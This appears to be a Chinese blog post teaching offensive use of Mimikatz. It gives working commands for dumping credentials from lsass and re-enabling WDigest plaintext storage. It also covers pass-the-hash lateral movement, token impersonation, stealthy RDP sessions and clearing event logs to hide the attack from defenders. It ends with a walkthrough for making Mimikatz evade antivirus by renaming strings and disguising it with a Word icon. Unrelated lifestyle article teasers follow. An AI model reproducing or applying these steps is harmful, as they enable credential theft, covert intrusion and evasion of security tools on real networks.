360病毒库升级包,内网渗透的基本原理

0x01 工具介绍工具原理Mimikatz 的主要原理是在 Windows 系统中用户登录后系统会将身份凭证存储于lsass.exe进程的内存当中,Mimikatz 通过注入lsass.exe进程读取进程内存,从中获取对应的明文密码。常见问题在 Windows Vista 系统之后不再存储 LM HASH,而 Windows 8.1 系统之后内存中也不再存储明文密码,因此在高版本 Windows 系统中无法利用 Mimikatz 直接读取明文密码。Mimikatz 能获取明文密码的关键是 wdigest,这是一个可逆算法,相关注册表存储位置如下:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest “UseLogonCredential”(DWORD)后续高版本的 Windows 系统不能读取明文是因为关闭了该注册表键,如果想要重新获取明文,只需要开启该注册表后再输入密码重新登录即可。

reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\ /v UseLogonCredential /t REG_DWORD /d 1给小伙伴整理了相对应的学习资料,如果你需要的话,我也可以分享一部分出来(涉密部分分享不了),需要的可以

【一帮助网络安全学习一】关注我,私信回复“资料”免费领取256G网络安全自学资料0x02 基础使用常见用法Mimikatz 的启动需要管理员/SYSTEM权限运行,默认情况下拥有 32 位以及 64 位版本,在 Kali Linux 中默认存放位置为/usr/share/mimikatz,大多数人使用 Mimikatz 一般只用到两个命令,而对其他命令不太了解,接下来会为大家全面介绍 Mimikatz 这款神器。

privilege::debugsekurlsa::logonpasswords也可以使用一句话输出保存

mimikatz.exe “sekurlsa::minidump lsass.dmp” “sekurlsa::logonpasswords” “exit”> pssword.txt基本语法使用命令可查看全部功能模块

::

调试进程修改运行权限为SYSTEM

privilege::debugprivilege:: #查看 privilege 的运行模块

开启日志记录,保存读取的用户凭证信息

standard::log

0x03 常用模块Crypto模块加密模块主要用于导出可导出的证书,利用 CryptoAPI 函数访问证书,相当于简化版的 certutil。有时候一张合法的证书非常有用,当利用合法证书生成木马程序时可能被杀软认做白名单程序从而不进行查杀。相关参数如下:

/provider #指定提供者/providertype #指定提供类型/cngprovider #CNG提供者/export #导出密钥 PVK 文件

查看相关密钥的提供者

crypto::providers

 

查看当前系统存储信息

crypto::stores

 

常见的系统存储用户名包括:CURRENT_USERUSER_GROUP_POLICYLOCAL_MACHINELOCAL_MACHINE_GROUPLOCAL_MACHINE_ENTERPRISECURRENT_SERVICEUSERSSERVICES指定系统存储为local_machine进行查看

crypto::stores /systemstore:local_machine

 

查看用户当前证书

crypto::certificates

导出 ROOT 根证书

crypto::certificates /store:Root

 

导出证书必须配合 store 参数。其中公钥为DER,私钥为PFX,密码为 mimikatz

crypto::certificates /store:Root /export

 

使用 CryptoAPI 打补丁,有时候证书无法导出可能就是补丁没有打

crypto::capi

使用 CNG 打补丁,用于导出未标记可导出的证书

crypto::cng

列出智能读卡器,可能会出现报错

crypto::sc

查看相关密钥

crypto::key

 

使用 OpenSSL 生成证书

openssl rsa -inform pvk -in key.pvk -outform pem -out key.pemSekurlsa模块Sekurlsa 模块能从lsass.exe进程中提取 passwords、keys、pin、tickets 等用户凭据信息,是最常用到模块。查看所有身份认证信息,成功拿到用户明文密码

sekurlsa::logonpasswords

 

查看用户哈希可能会出现报错,这主要是由于当前权限较低

lsadump::sam

解决方法非常简单,只要以系统权限运行即可

process::runp在新窗口中再次运行可成功拿到哈希

重置用户 NTLM 哈希会把哈希直接写入 SAM 数据库当中,因此执行该操作相当于重置密码,再次登录需要使用新密码进行登录

lsadump::setntlm /user:admin /ntlm:b2781ba85ac750ec286744b009599637

 

转储并导出lsass.exe进程

sekurlsa::minidump lsass.tmp通过哈希传递进行横向移动

sekurlsa::pth /user:admin /domain:host1 /ntlm:b2781ba85ac750ec286744b009599637sekurlsa::pth /user:admin /domain:host1 /aes256:b2781ba85ac750ec286744b009599637凭证管理器中可查看 Windows 凭证

Token模块Token 模块主要用于查看、假冒现有 token。查看当前 token 信息

token::whoami

查看 token 列表并假冒系统管理员

token::listtoken::elevate /NT AUTHORITY\SYSTEM

 

还原假冒进程

token::revert

其他模块一般情况下重复登录远程桌面会导致已登录用户会直接退出或提示有其他用户登录

 

配合命令无提示登录远程桌面,该功能在 HW 中非常好用,即使管理员处于登录状态,我们仍能悄悄登录其他用户

ts::multirdp

成功登录原会话不受影响,使用命令查看会话列表

ts::sessions

 

虽然目前不会被已登录用户发现,但在事件查看器当中仍会存在登录日志

 

使用命令一键清除日志

event::clear

成功清除日志后蓝队工程师无法通过系统日志来还原攻击过程

 

安装/卸载 Mimikatz 服务,帮助我们监听用户输入

service::+service::-

成功安装 Mimikatz 服务且已自动启动

 

比如监听粘贴文本

misc::clip

0x04 免杀利用Mimikatz 作为最常用的黑客工具早已被各大安全软件标记,比如360杀毒、360安全卫士、卡巴斯基等。使用源码免杀能帮助我们绕过杀毒软件的查杀,这是一种基于特征码的免杀方式,只需定位到源码中的特征代码进行修改就可达到免杀效果,一般会定位三个位置,分别是代码、字符串和输入表。准备环境在免杀前需要准备以下三个要素:Mimikatz 源码Visual Stdio 2019(C++)vc依赖文件在 Github 中下载最新版的 Mimikatz

下载地址:https://github.com/gentilkiwi/mimikatz

 

更新 360 杀毒、病毒库为最新版本

配置问题点击 Mimikatz 中的启动文件启动 Visual Stdio,在帮助菜单》关于〉查看许可证状态中输入激活证书可成功激活。而在 VS 2012 中如果出现报错信息(error MSB8020),解决方法为进入项目》属性〉常规》平台工作集中,将平台改为 VS 2012(v110)后即可成功运行编译。

 

选择生成出现报错界面,点击工具》获取工具和功能〉C++ 进行桌面开发》C++ Windows XP Support for VS 2017 v141,点击修改即可解决问题

 

下载安装完成后修改手工工具集为 2017 版本

 

在配置属性中的 C++ 中修改将警告视为错误改为否,否则每当出现错误就无法编译

重新生成又出现报错:MSB8036

在项目属性页选择已安装的 SDK 版本

点击重新生成后成功编译 32 位 Mimikatz

 

如果需要生成 64 位程序可在解决方案》配置属性选择平台为x64

点击重新生成成功编译 64 位 Mimikatz

免杀过程步入正题选择项目 mimikatz 的编辑》查找和替换》在文件中替换

把关键字 mimikatz 所有的字符串替换为 macsec,点击全部替换即可

由于字符串全部被替换,导致引入 mimikatz 的文件名也被替换,因此需修改全部文件名为 macsec

点击重新生成后输出macsec.exe

虽然目前能够进行静态查杀,但是还是无法绕过动态查杀

 

进一步删除macsec.c和macsec.h的注释信息

再次重新生成程序使用360测试仍无法绕过动态查杀

 

在macsec.rc中修改版本信息,把带有 gentilkiwi 的公司名修改为 macsec

 

修改图标macsec.ico为 Office Word 图标后再次点击生成

放入免杀环境再次运行即可成功绕过

当然命令也能够成功执行

 

完成免杀后可上传至云平台查杀测试,但一般不要这么做,云平台会标记免杀程序

本文来自投稿,不代表展天博客立场,如若转载,请注明出处:https://www.me900.com/323687.html

(0)

相关推荐

  • 薄荷石蜡油,石蜡油和薄荷油哪个对出鼻好

    1.滴鼻剂的用途 当患者有感冒、鼻炎、鼻窦炎、过敏性鼻炎、急性中耳炎、鼻出血等疾患时可以考虑使用滴/喷鼻剂。 2.滴鼻剂的分类 目前最常用的滴鼻剂主要有四大类,一是血管收缩剂:最常用是**类的滴鼻液,主要起收缩黏膜血管的作用,能短期内解除鼻塞。二是激素类滴鼻剂:常用的有布地奈德/辅舒良/内舒拿鼻喷剂,该类药有抗炎、抗过敏和抗水肿作用,可促使病变的鼻黏膜生理功…

    2023-06-26
  • 冬笋怎么保存时间长而新鲜(新鲜冬笋怎么保存比较好)

    各位读者朋友们大家好,感谢阅读我分享的美食文章,经验和大家一起共享,今天我要和大家分享的内容是:『冬笋上市了,笋农教你2个保存方法,不腌制不晒干,放1年也鲜脆!』 进入11月,尤其是立冬之后,是冬笋大量上市的时候,可以说是“冬天第一鲜”,是毛竹(楠竹)的地下茎(竹鞭)侧芽发育而成的笋芽,还没有从土里冒出来,笋肉幼嫩,口感鲜美。 冬笋的营养价值很高,属于高蛋白…

    2022-05-06 用户投稿
  • 金融界财富论坛,投融研联盟执行总裁

    金融界5月15日消息 在“515全国投资者保护宣传日”到来之际,金融界特别发起主办“2023投资融合发展研讨会暨金融界投教宣传年发布会”。西南财经大学信托与理财研究所作为学术支持,丽泽商务区管委会、普益标准为支持单位,30余家金融机构领导出席了本次活动。 在主题为“科技赋能,探索投教新模式”圆桌论坛中,华夏理财固定收益投资部总经理王涛表示,公司在2020年9…

    2023-06-07
  • 关于鲁迅的资料(文学巨匠鲁迅先生)

    1936年10月19日清晨,近代著名的文学家、思想家、教育家鲁迅先生,于上海去世,该消息一出,举国同悲,当即除了许多名人大家们前来送上了挽联悼念,更有无数普通的老百姓在殡仪馆外自发的为这位大文豪默哀,不过就在鲁迅先生逝世的第三天,也就是其出殡的那天,众人却意外的发现了一个匪夷所思的现象,那就是鲁迅先生的遗体虽然没有伤痕,但却显得十分的消瘦…. 这…

    2023-06-11 用户投稿
  • 淘宝双11晚会,双11淘宝晚会节目单

    《淘宝双11晚会:一场电商与娱乐的狂欢盛宴》 在电商的浩瀚宇宙中,淘宝双11晚会仿佛是一颗璀璨的明星,每年都吸引着无数人的目光。 它不仅仅是一场晚会,更是淘宝对其双11购物节的一次盛大献礼,是电商与娱乐的完美结合。 那么,淘宝双11晚会到底有哪些独特之处呢?它又对淘宝的双11购物节产生了哪些深远的影响呢?让我们一起来深入探讨一下。 一、晚会的起源与发展 淘宝…

    2025-05-30
  • 申请联通3元月租卡(联通流量王纯享版)

    最近逛联通APP惊现超实惠套餐:流量王纯享版 超大流量 103GB通用流量+100分钟只需33元/月,可办理2张副卡。 说明: 1、套餐外资费:国内语音0.15元/分钟,国内短、彩信0.1元/条,开通流量放心用功能,即国内流量按照0.02元/ MB 计费,累计至250MB(5元)后,按照5元/ GB 计费,流量超过1GB后仍按上述标准计收,以此类推。 2、流…

    2023-05-29
  • 土耳其vs意大利在哪举行

    直播吧11月17日讯 欧足联今天通过官方网站确认,在欧洲中部时间11月16日12:00(北京时间19:00)的截止时间后,已收到三家竞标者提交的主办2028年和2032年欧洲杯的初步申办文件。 英格兰、北爱尔兰、爱尔兰、苏格兰和威尔士足球总会提交了2028年欧洲杯的申办文件,土耳其足协提交了申办2028年或2032年欧洲杯的文件,而意大利足协提交了申办203…

    2023-06-05
  • 2020年成都限行新规介绍

    临时交通管理措施 根据成都市大气、水、土壤污染防治“三大战役”领导小组办公室《关于12月16日零时解除重污染天气预警的通知》要求,按照《成都市重污染天气应急预案(2020年修订)》和《成都市公安局交通管理局关于空气重污染期间实施临时交通管理措施的通告》,成都市公安局交通管理局决定于2021年12月16日零时起,解除重污染天气预警临时交通管理措施。 成都市机动…

    2023-05-22
  • 国际十大女装品牌,【最新】十大国际女装品牌排名指南

    #头条创作挑战赛# 这家高级时装公司由商人 Thierry Hermès 于1837年创立,最初是一家马具制造商。在 20 世纪之交,在Thierry 的儿子Charles-émile 的领导下,行李箱和手提包的发展出现了飞跃,并采用了骑手可以用来携带马鞍的挎包的形式。 它的皇室赞助意味着该公司是法国第一家获得在其产品中使用拉链的专有权的公司。爱马仕 (He…

    2023-05-10
  • 如何利用鸡蛋做出美味美食的烹饪技巧

    鸡蛋是一种非常常见的食材,也是营养非常丰富的食品之一。除了可以直接煮熟食用外,还有许多不同的烹饪方法,能够让鸡蛋变得更加美味。下面就介绍5款好吃的鸡蛋做法,供大家参考。 一、葱油煎蛋 水煮蛋是一种健康美味的食品,制作简单,口感爽滑,营养丰富。它可以作为早餐、午餐或晚餐的一部分,营养价值非常高。 材料:鸡蛋2个、清水、盐 制作过程: 1、将鸡蛋放入锅中,加入足…

    2023-05-22
  • 支付宝赏金怎么用,支付宝得到的赏金怎么用

    《支付宝赏金怎么用?全面解析与实用指南》 在当今数字化的生活中,支付宝已经成为了我们日常生活中不可或缺的一部分。 而支付宝赏金作为支付宝推出的一项福利活动,也许能给我们带来一些额外的惊喜和实惠。 那么,支付宝赏金到底怎么用呢?接下来,我将为大家详细解析。 一、了解支付宝赏金的概念 支付宝赏金,简单来说,就是在某些特定的场景或活动中,支付宝为用户提供的一种奖励…

    2025-06-02
  • 淘宝u站中心,u站中心官网

    《淘宝U站中心:探索与解析》 一、淘宝U站中心的概述 淘宝U站中心可能是淘宝平台上一个相对较为独特的存在。 它就像是淘宝这个庞大商业帝国中的一个小型枢纽,有着自己独特的功能和作用。 我觉得它也许是为了满足淘宝商家和用户在某些特定方面的需求而设立的。 从表面上看,它的名字似乎带有一种神秘的色彩,让人不禁想要深入了解它到底是做什么的。 二、淘宝U站中心的功能与特…

    2025-03-12